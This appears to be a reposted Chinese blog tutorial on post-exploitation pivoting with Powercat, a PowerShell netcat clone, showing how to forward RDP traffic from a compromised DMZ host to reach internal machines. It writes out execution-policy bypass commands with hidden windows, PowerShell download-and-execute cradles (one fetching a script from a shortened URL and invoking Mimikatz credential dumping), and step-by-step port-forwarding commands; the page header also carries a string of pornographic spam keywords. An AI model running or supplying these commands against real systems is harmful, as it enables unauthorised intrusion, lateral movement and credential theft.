日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

powerCat进行常规tcp端口转发

發布時間:2023/11/30 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 powerCat进行常规tcp端口转发 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

實戰中,我們也會遇到需要我們進行端口轉發的情況,比如已經拿下的目標機1是在dmz區,而目標1所在內網的其他目標只能通過目標1去訪問,這時候我們就需要端口轉發或者代理來進行后滲透。這次就要介紹一個加強版的nc,基于powershell的后滲透工具

Powercat

?

?

下載地址:Lhttps://github.com/besimorhino/powercat

?

0x01 powercat準備

首先得改一下ps的執行腳本權限

Set-ExecutionPolicy Bypass

?

?

然后直接執行我們的powercat腳本即可。

?

?

也可以通過常規三種繞過執行策略的方式執行ps腳本

?

本地權限繞過

PowerShell.exe?-ExecutionPolicy?Bypass?-File?xxx.ps1

本地隱藏權限繞過執行腳本

PowerShell.exe?-ExecutionPolicy?Bypass?-NoLogo?-Nonlnteractive?-NoProfile?-WindowStyle?Hidden(隱藏窗口)?-File?xxx.ps1

IEX下載遠程PS1腳本回來權限繞過執行

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz-DumpCreds"

所以,直接選擇最簡單的吧,也別下載了,直接遠程權限繞過,在Powershell?中執行:

IEX?(New-Object?System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

?

?

?

可以看到Powercat已經成功執行了

?

?

?

0x02 使用powercat端口轉發

?

先來看下參數

?

?

?

?

?

?

?

不過端口轉發中我們只需要其中幾個參數

命令解析:

-c?指定一個ip地址

-p?指定一個端口

-v?顯示詳情

-l?監聽模式,用于入站鏈接

-p?本地端口號

-e?程序重定向,跟nc一毛一樣

-v?顯示詳情

下面用實際例子來說明每個參數的作用

?

?

?

?

?

?

?

?

?

?

?

?

?

?

例子一:

?

環境: 192.168.190.135 ?windows2003開放了3389(目標機)

????192.168.190.149 ?windows8 (攻擊機)

?

192.168.190.135上的3389服務流量轉發到本地的9001端口,攻擊機用到的命令為:

?

powercat -c 192.168.190.135 -p 3389 -v -r tcp:9001

?

然后連接本地的9001端口,可以發現是轉發成功的。

?

?

例子二:

?

環境: 192.168.190.135 ?windows2003開放了3389(內網目標機)

????192.168.190.151 ?windows8 (外網目標機)(與內網目標機處一個內網)

192.168.190.149 ?windows8 (攻擊機)

Ps:假設攻擊機拿下了外網目標機的權限,想進一步內網滲透但是不能直接訪問內網目標機的3389服務,只能通過外網目標機訪問內網目標機的3389服務。

?

?

?

?

外網目標機執行:

powercat -c 192.168.190.135 -p 3389 -v -r tcp:6666

(連接內網目標機的3389端口,將流程轉到自己的6666端口)

?

?

?

攻擊機執行:

powercat -c 192.168.190.151 -p 6666 -v -r tcp:1111

(連接外網目標機的6666端口,把流程轉到本地的1111端口)

?

可以看到轉發成功。

?

轉載于:https://www.cnblogs.com/-qing-/p/10652351.html

創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的powerCat进行常规tcp端口转发的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。